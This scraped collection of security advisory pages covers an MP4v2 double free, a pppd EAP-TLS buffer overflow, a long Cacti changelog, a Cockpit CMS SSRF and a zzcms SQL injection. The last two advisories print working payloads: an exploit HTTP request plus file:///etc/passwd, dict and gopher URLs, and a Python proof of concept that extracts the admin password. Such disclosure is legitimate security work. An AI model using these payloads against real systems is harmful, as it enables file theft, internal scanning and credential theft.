The \`prev\_inuse\` flag is ignored for fastbin, and there are some other
buffers freed during the double free. Some of them happened to be of the
same size(32 bytes) and the double free check is passed for 64-bits MP4v2.
Yet for 32-bits MP4v2 those buffers are of different size the program would
abort.

root@...ian:~/src/mp4v2-2.0.0-orig-x64# dpkg -s mp4v2-utils
Package: mp4v2-utils
Status: install ok installed
Priority: optional
Section: sound
Installed-Size: 281
Maintainer: Debian Multimedia Maintainers <
pkg-multimedia-maintainers@...ts.alioth.debian.org>
Architecture: i386
Source: mp4v2 (2.0.0~dfsg0-5)
Version: 2.0.0~dfsg0-5+b1
Depends: libmp4v2-2 (= 2.0.0~dfsg0-5+b1), libc6 (>= 2.4), libgcc1 (>=
1:4.2), libstdc++6 (>= 5.2)
...

root@...ian:~# mp4info c1.mp4
mp4info version -r
c1.mp4:
\*\*\* Error in \`mp4info': double free or corruption (fasttop): 0x56d883d0 \*\*\*
...

========= Fix =========

One way to fix the bug is to clear the dangling pointer after the the first
free.

========= Reference =========

https://code.google.com/archive/p/mp4v2/

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14054: security - Fastbin double free in MP4v2 2.0.0

Improper input validation together with an integer overflow in the EAP-TLS protocol implementation in PPPD may cause a crash, information disclosure, or authentication bypass. This implementation is distributed as a patch for PPPD 0.91, and includes the affected eap.c and eap-tls.c files. Configurations that use the `refuse-app` option are unaffected.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 11 Jun 2018 14:57:16 -0400
From: Luciano Bello <luciano@...ian.org>
To: oss-security@...ts.openwall.com
Cc: team@...urity.debian.org
Subject: Buffer Overflow in pppd EAP-TLS implementation

- Software: pppd, in particular the EAP-TLS patch\[1\]

- Summary: Several buffer overflows can be trigger even when pppd is not
configured to take EAP-TLS (but the binary was patched with the
extension).

- CVE: CVE-2018-11574

- Credit:
Ivan Gotovchits <ivg@...e.org>, from Carnegie Mellon University Binary
Analysis Team

- Background:
We, the Debian security team, received the report and contacted the
package maintainer and upstream. Upstream and submitter work together to
agree a patch.

- Patch:
attached.

- Relevant parts of the original report:


We would like to report a security vulnerability that we have discovered
in the EAP-TLS patch for pppd \[1\]. Improper input validation together
with an integer overflow may cause a crash on both sides and, unlikely,
may lead to the information disclosure or authentication bypass.

Detailed Description
===============

Context
-----------

The \`eaptls\_receive\` function (eap-tls.c) is used to process data passed
via the ppp channel. It is used on both peer and authenticator sides and
is tasked to process and accumulate fragmented messages and pass them to
the SSL backend for the authentication. The message format is described
in RFC 5216. The \`eaptls\_receive\` function is called by \`eap\_response\`
(eap.c) and \`eap\_request\` (eap.c), which implement the \`input\` method
of the EAP protocol, that is invoked in the \`get\_input\` (main.c)
procedure, when the EAP protocol is enabled.

Problem Description
---------------------------

The EAP TLS protocol uses packages with variable lengths and passing a
short package message will result in the out-of-bounds read (CWE-125)
and calling \`memcpy\` with a negative length parameter will lead to the
buffer overread (CWE-126), as well as the buffer overflow (CWE-122).
Details, follow.

The \`eaptls\_receive\` function is called with three parameters, the
session pointer \`ets\`, the pointer \`inp\` to the buffer that contains
data received by the ppp channel, and the length \`len\` of this buffer.
The \`len\` parameter is a signed \`int\`.

Under all paths that reach this point, the constraint on the \`len\`
parameter is \`len >= 0\`, i.e., all checks before the invocation only
verify that the message is long enough to be dispatched. Every check
advances the pointer and decrements the length. For example,

     - main.c:1048-1058 // ensures that len was at least 4
     - eap.c:2077-2083  // ensures that len was at least 1

There are no checks of the \`len\` parameter in the \`eaptls\_receive\`
function at all. The very first operation (eap-tls.c:804) in the
function is to read the flags field, that is not guaranteed to be
present, as \`len\` could be \`0\` here.  There are few more unbounded reads
at \`eap-tls.c:812\` and \`eap-tls.c:838\`. Each read is accompanied with
the corresponding decrementation of the length parameter. Thus, in case
of a short package, the length could have a negative value (anything
between -1 and -5). The check \`!(len + ets->datalen > etc->tlslen)\` is
passed easily since \`len\` is negative, thus the \`memcpy\` call
(obfuscated with the BCOPY macro) will receive the negative \`len\`
parameter, that will most likely result in the segmentation fault and a
crash of the server or client.


More Advanced Scenarios
-----------------------------------

We're hypothesizing, that instead of crashing the daemon it is
theoretically possible to overwrite server memory structures, during the
buffer-overflow in \`memcpy\` in such way that it will change the state of
authentication FSM to a more advanced state (e.g., to the authenticated
state). To achieve this, an adversary may rely on the Session Resumption
mechanism (RFC 5216, section 2.1.2), create the first session and put it
on hold, then create several other sessions and fill in the memory of
the server until the brk raises till the 4Gb bar (the \`len\` parameter is
32 bit in x86 and x86-64), then the first session could be resumed, and
the \`memcpy\` won't cause the segmentation fault, but overwrite internal
structures of the server.

We did not investigate this scenario any further.


Further Details
--------------------

The vulnerability was detected using the Memcheck verification tool of
the Primus Microexecution Framework (a part of the CMU Binary Analysis
Framework \[2\]). We ran it on a vanilla \`pppd\` binary as shipped in
Ubuntu Xenial. All source code references are made on the patched source
obtained with \`apt-source\`. Primus runs a program in the emulated
environment. A reduced trace showing the problem is attached (in IDA Pro
format and in plain-text)

**View attachment "**ppp-2.4.7-eaptls-mppe-1.101a.patch**" of type "**text/x-patch**" (88939 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-11574: security - Buffer Overflow in pppd EAP-TLS implementation

The script '/adminui/error_details.php' in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks.

CVE-2018-11135

Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used).

Type

ID

Text

feature

Add a Timeout setting for Remote Agent calls

feature

Add Graphs and Data Sources hyperlinks on Device page

feature

Add One Minute Sampling to the default Data Source Profiles

feature

Add support for DDERIVE and DCOUNTER to Cacti

feature

Add Timezone support for Remote Data Collectors

feature

Allow Adding Aggregate Graphs to a Report

feature

Allow ASCII filepath paths to not be found on settings save

feature

Allow drill down from Graphs to Data Queries or Templates

feature

Allow Import/Export to be hookable

feature

Allow snmpagent to be disabled for very large installs

feature

Allow Top tabs to be Glyphs or Text or both

feature

Big Spanish translation update plus massive QA fixes

feature

Change password page provides visible confirmation of password rules

feature

Do not allow second data source to be added to an SNMP Get data template

feature

Don't allow removal of Data Sources from Data Template once its in use

feature

Inform the primary Cacti administrator of problems by Email

feature

Make all user settings dynamic and allow resetting to default.

feature

Make Graph and Data Source suggested naming more efficient

feature

Make it easy to find Data Query based graphs that have lost indexes

feature

Make Top Tabs use Ajax Callback

feature

Make tree editing responive

feature

New Install/Upgrade user permission to limit access to being able to upgrade

feature

Provide option to debug width errors where output exceeds column width

feature

Removed the Authentication Method of 'None'

feature

Tree automation is now defaulted to on for new install

feature

Update JavaScript library c3.js to version 0.6.8

feature

Update JavaScript library Chart.js to 2.7.3

feature

Update JavaScript library d3.js to version 5.7.0

feature

Update JavaScript library jquery.js to 3.3.1

feature

Update JavaScript library jquery-migrate.js to 3.0.1

feature

Update JavaScript library jquery.tablesorter.js to version 2.30.7

feature

Update JavaScript library jstree.js to 3.3.7

feature

Update JavaScript library screenfull.js to 3.3.3

feature

Update phpmailer to version 6.0.6

feature

Update phpseclib to version 2.0.13

feature

289

Allow external nologin access for Realtime Graphs

feature

553

When display a host, include Aggregated Graphs as well as standard graphs

feature

614

Allow users to duplicate Data Input Methods

feature

973

When creating a new user authenticated via LDAP, attempt to retrieve users email and full name

feature

122

Support a Site Branch Type

feature

1060

Design Enhancement for Large scale Cacti Implementations

feature

1142

Add Site dropdown to the Graphs and Data Source pages

feature

1184

Improve Data Input Methods editability and message handling

feature

1200

Aggregate Graphs can now include COMMENT

feature

1282

Email notification for Automation Network discovery process

feature

1347

Update automation logging to work better

feature

1395

Ensure messages have each new line keep the same prefix in cacti\_log()

feature

1399

Allow 'requires' to include version against a plugin

feature

1400

User settings are now dynamic and can be reset (removed) to return to global settings

feature

1422

Automatically select the next unused data input field when clicking add on data input method

feature

1505

When displaying a graph, provide breadcrumb link to edit device

feature

1527

Update Fontawesome from 4.7 to 5.0.10

feature

1580

Support Drag & Drop for Builtin Report Items

feature

1581

Allow Mass Adding of Graphs to Reports

feature

1584

Allow theme selection when installing

feature

1588

Check that PHP can run a test file

feature

1593

Allow External links to auto refresh

feature

1597

Ensure synchronised files have same attributes as originals

feature

1610

On Unix, redirect error messages to log files when running external scripts

feature

1628

Allow the User to define an initial Automation Network for discovery when installing

feature

1670

Improve Graph Management to show type of source for a graph

feature

1671

When duplicating a Graph Template, properly duplicate Data Query Graph Template Mappings

feature

1677

Default Tree nodes sorting to be inherited

feature

1691

On Graph context menu, add a 'Copy graph' option to copy graph image

feature

1692

Separate option for logging Input Validation issues

feature

1703

On Graph context menu, text is now multi-lingual

feature

1708

Allow the User to override global Automation email recipients at the Automation Network level

feature

1709

Suppress warning from RRDTool when attempting to make updates in the past

feature

1711

Add support for SSL connections to MySQL

feature

1731

Prevent loss of changes by warning user about unsaved items

feature

1734

When displaying a graph, provide more information when error image is displayed (see also #1428)

feature

1763

Enable automatic refresh for Time Graph View

feature

1806

Control low level debug routines via config.php (Develoepr Use)

feature

1819

Provide CLI program to enable graphs to be removed by scripts

feature

1969

Graph previews can now be linked using a host's external id

feature

2006

Introduce new Data Source Profile to handle decade long graphs

feature

2173

Introduce Device and Graph Template Caching to Speed UI

feature

2228

Add Device ID to Device search field

issue

Fix issue with display\_custom\_error\_message() causing problem with system error message handling

issue

Graph List View was not fully responsive

issue

Move Graph removal function to Graph API

issue

On the Data Sources page, if there is no filtered Device and a Data Source is edited, device association is lost

issue

Typo in Dutch translations when an error occurred while downgrading

issue

Unable to display user profile tabs

issue

Verify all Fields not working due to Cacti 1.x upgrade error

issue

186

Cacti does not support jQueryUI 1.12.x

issue

187

Remove the use of jQuery Migrate plugin

issue

948

Do not create a new datasource when adding a new Graph for the same device/field

issue

454

Cacti Re-Index does not resolve index changes properly during re-index

issue

983

Import Template Preview is misleading

issue

1097

When copying template user, newly created user should always be enabled to allow logging in

issue

1097

When copying template user, it should be disable to prevent logging in as template user directly

issue

1174

When display a tree, disable drag and drop unless in edit mode

issue

1298

Display fatal error to prevent issues caused when system log is not writable

issue

1350

When switching an Automation Tree Rule's leaf type, remove invalid Automation Rule Items

issue

1383

CSRF Timeout does not obey session timeout

issue

1408

Update SQL / Backtrace to use new clean\_up\_lines() function

issue

1414

DSSTATS reports incorrectly that a data source does not exist

issue

1420

Fix issues found by Debian package builds

issue

1421

Fix issue when SQL had all bad modes, missing variable warning was generated

issue

1426

Fix issue where remote poller was not using unique filenames when attempting to verify files

issue

1437

Plugin install hover message sometimes shows line breaks rather than formatted text

issue

1454

When using oid\_regexp\_parse, filter indexes to those that match

issue

1473

Recovery Date overwritten by subsequent checks

issue

1494

Unable to Deep Link/Bookmark Trees

issue

1503

Undefined function clearstatscache in DSSTATS

issue

1507

When saving graph settings from the graph page, the graph template id should not be included

issue

1510

New Graphs Undefined Variable $graph\_template\_name

issue

1521

Force boost to be enabled when there are Remote Data Collectors

issue

1528

Saving a device can result in WARNINGS related to string vs array handling

issue

1529

Allow Aggregate Graphs to Sum Bandwidth and Percentile COMMENTS

issue

1543

Graph Preview appends header=false too many times

issue

1553

Poller does not set rrd\_step\_counter correctly if no steps taken

issue

1559

CLI Output Issues due to over escaping

issue

1560

Warning that escapeshellarg() is escaping a null

issue

1567

Technical support - add notification if Cacti and Spine version is different

issue

1574

User templates are not correctly being applied

issue

1589

Installer now checks that the temporary folder is writable

issue

1590

User Admin generates SQL error if user is not part of any groups

issue

1601

Aggregate Graphs can not include some classes of COMMENT

issue

1602

PHP ERROR: Call to undefined function api\_data\_source\_cache\_crc\_update()

issue

1604

Failed to connect to remote collector

issue

1606

Boost debug log not functional

issue

1607

Boost next run time occurs in the past

issue

1608

Possible boost race conditions

issue

1609

Remote pollers update 'stats\_poller' on main poller

issue

1617

Editing a data query results in missing $header variable

issue

1621

Realtime Popup can cause automatic logout

issue

1626

httpd-error.log have message about Fontconfig

issue

1634

Default snmp quick print setting resulting in false poller ASSERTS on some php releases

issue

1651

Check temporary folder has write access during import

issue

1655

Correct Cacti to handle new MySQL 8.0 reserved word \`system\`

issue

1658

Devices drop down should be filtered by Site

issue

1660

Reports based upon Tree don't maintain graph order

issue

1665

Must change password not working for local users when main realm is not local

issue

1669

Console log header grammar issue

issue

1674

Threads and Processes values not migrated to Poller table during upgrade

issue

1676

Allow automation discovery to add the same sysname on different hosts

issue

1682

Slow Select Statement lib/api\_automation.php

issue

1689

Technical Support's RRDTool version should show detected RRD version

issue

1690

Report a warning if the default collation is not utf8mb4\_unicode\_ci

issue

1700

Mail sent without auth causes errors to appear in logs

issue

1710

RRDtool create command causes first update to fail

issue

1721

Console Side Bar not correct on first login

issue

1723

die() messages should include PHP\_EOF for better logging

issue

1726

Poor page performance editing a Graphs Graph Items

issue

1746

Poller with no hosts does not exit until timeout is reached

issue

1761

Graph Management page shows bogus template names

issue

1783

Browser Back button still does not working

issue

1796

Import: Fixed handling of references to objects not included in file

issue

1799

Default User log sort should be date descending

issue

1810

Correct SQL errors with authentication set to no authentication

issue

1839

Dummy cosmetic bug on down device selection option

issue

1841

Data Source Stats table not properly migrated from pre 1.x Cacti plugin

issue

1849

SNMPAgent not sending traps

issue

1852

Reports Preview/Mails show no graphs

issue

1889

Insecure $ENV{ENV} which running setgid

issue

1901

Upgrade from 0.8.8h fails on external\_links statement

issue

1921

Data Query XML field method 'rewrite\_index' does not correctly query for value

issue

1926

Deselecting items should present warning or disable GO button

issue

1948

Device Template should warn about need to re-sync

issue

1953

set\_default\_action() should warn if more than one action provided

issue

1973

SpikeKill Menu does not display properly

issue

1976

Default admin permissions do not allow everything

issue

1982

Certain hooks should occur within api functions rather than UI functions

issue

2002

api\_plugin\_db\_table\_create should support non-string defaults

issue

2012

For kernel 3.2+, "Linux - Memory - Free" should grep for "MemAvailable:", not "MemFree:"

issue

2085

CLOG Regex Parser does not verify registered function exists

issue

2126

api\_device.php generates undefined function poller\_push\_to\_remote\_db\_connect()

issue

2127

Unable to save error when duplicating graph

issue

2135

api\_tree\_lock() and api\_tree\_unlock() forcing redirection incorrectly

issue

2143

export.php Illegal string offset 'method'

issue

2144

Device Management "Status" column does not sort properly

issue

2152

When editing a device, should show disable/enable option

issue

2153

Utilities page issues the wrong hook for tabs

issue

2163

LDAP functions are not consistent

issue

2164

Login page does not remember selected realm

issue

2171

datepicker and timepick translation not available

issue

2178

Header/Footer included more than once

issue

2182

Graph View missing 'html\_graph\_template\_multiselect()' function

issue

2184

html\_host\_filter() does not handle host\_id consequently

issue

2186

Boost generates invalid SQL during on demand update

issue

2188

SNMP timeout errors are being duplicated

issue

2191

i18n\_themes is not properly primed in global\_arrays.php

issue

2202

Can't create more than one graph with add\_graphs.php from one template

issue

2207

Removing Graph Template does not Remove Data Query Associations

issue

2217

cmd.php not handling quoted snmp values properly

issue

2240

SNMP system Data Input Methods should not be modified on import

issue

2241

Spike removal not functional due to Debian packaging

security

1072

Prevent exploitation of Data Input Methods to escalate privileges (CVE-2009-4112)

security

1882

Bypass output validation in select cases

security

2212

Stored XSS in "Website Hostname" field

security

2213

Stored XSS in "Website Hostname" field - Devices

security

2214

Stored XSS in "Vertical Label" field - Graph

security

2215

Stored XSS in "Name" field - Color

unknown

CVE-2018-10061: The Complete RRDTool-based Graphing Solution

SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: "service () baimaohui net" <service () baimaohui net>  
_Date_: Wed, 4 Apr 2018 20:50:10 +0800  

\# SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

The Cockpit CMS is awesome if you need a flexible content structure but don't want to be limited in how to use the 
content.

## Product Download: https://getcockpit.com/

## Vulnerability Type：SSRF（Server Side Request Forgery）

## Attack Type : Remote

## Vulnerability Description

Cockpit CMS uses a \`fetch\_url\_contents\` （https://github.com/aheinze/fetch\_url\_contents）project code on github website, 
This Project has SSRF Vulnerability，So affect the system.

The vulnerability code（/assets/lib/fuc.js.php）:

    if (isset($\_REQUEST\['url'\])) {

        // allow only query from same host
        echo(parse\_url($\_SERVER\['HTTP\_REFERER'\],PHP\_URL\_HOST));
    
        if ($\_SERVER\['HTTP\_HOST'\] != parse\_url($\_SERVER\['HTTP\_REFERER'\], PHP\_URL\_HOST)) {
            header('HTTP/1.0 401 Unauthorized');
            return;
        }
    
        $url     = $\_REQUEST\['url'\];
        $content = '';
    
        if (function\_exists('curl\_exec')){
            $conn = curl\_init($url);
            curl\_setopt($conn, CURLOPT\_SSL\_VERIFYPEER, true);
            curl\_setopt($conn, CURLOPT\_FRESH\_CONNECT,  true);
            curl\_setopt($conn, CURLOPT\_RETURNTRANSFER, 1);
            curl\_setopt($conn,CURLOPT\_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like 
Gecko) Chrome/24.0.1312.52 Safari/537.17');
            curl\_setopt($conn, CURLOPT\_AUTOREFERER, true);
            curl\_setopt($conn, CURLOPT\_FOLLOWLOCATION, 1);
            curl\_setopt($conn, CURLOPT\_VERBOSE, 0);
            $content = curl\_exec($conn);
            curl\_close($conn);
        }
        if (!$content && function\_exists('file\_get\_contents')){
            $content = @file\_get\_contents($url);
        }
        if (!$content && function\_exists('fopen') && function\_exists('stream\_get\_contents')){
            $handle  = @fopen ($url, "r");
            $content = @stream\_get\_contents($handle);
        }
    
        if (!$content) {
            header('HTTP/1.0 503 Service Unavailable');
        }
    
        return print($content);
    }


## Exploit

    GET /assets/lib/fuc.js.php?url=dict://127.0.0.1:3306 HTTP/1.1
    Host: 127.0.0.1
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 
Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\*/\*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8
    referer:http://127.0.0.1/index.php

modify the above url parameter，example，file:

request http(s) protocol: url=http(s)://www.google.com

file read：url=file:///etc/passwd or url=file:///c:/windows/win.ini

If the curl function is available,then use gopher、tftp、http、https、dict、ldap、file、imap、pop3、smtp、telnet protocols 
method，if not then only use http、https、ftp protocol

scan prot,example: url=dict://127.0.0.1:3306 
use gopher protocol: url=gopher://127.0.0.1:3306 

If the curl function is unavailable,this vulnerability trigger need allow\\\_url\\\_fopen option is enable in 
php.ini，allow\\\_url\\\_fopen option defualt is enable.

## Versions

Cockpit 0.13.0

## Impact

SSRF(Server Side Request Forgery) in Cockpit 0.13.0 version allow remote attackers to arbitrary files read，scan network 
port，information detection,internal network server attack.

## Credit

This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response 
Technical Team/Coordination Center of China (CNCERT/CC)

## References

CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14611

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)** _service () baimaohui net (Apr 06)_

CVE-2017-14611: SSRF（Server Side Request Forgery） in Cockpit CMS 0.13.0 (CVE-2017-14611)

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request.

**/dl/dl\_sendsms.php****Edition**

zzcms 8.2

**Location**

/dl/dl_sendsms.php

**Code**

$sql2=$sql." order by id asc limit $n,$size";

**Rows:73****Harm**

can get password through SQL injection

Cause the cause Take a look at the logic of the bug,If the POST request is not empty, the $sql value will be equal to $\_POST\["sql"\], $sql will be assigned to $sql2, $sql2=$sql." order by id asc limit $n,$size";

$sql not added ' ' This will cause SQL inject

 

Construct payload verification

sql=select email from zzcms\_dl where id=-1 union select group\_concat(distinct table\_name) from information\_schema.columns where table\_schema=database()#

 

**poc**

import requests
import string


url = "http://192.168.199.23/dl/dl\_sendmail.php"
cookies = {
'UserName':'1234','PassWord':'81dc9bdb52d04dc20036dbd8313ed055'}
flag = ''

data = {
     'sql':'select email from zzcms\_dl where id=-1 union select pass from zzcms\_admin #'
   }

r = requests.post(url,data,cookies=cookies)
r.encoding = 'utf-8'
print(r.text)

\[6\]

Get the administrator password

 \[6\]: ./images/6.png "6"

Tag

#php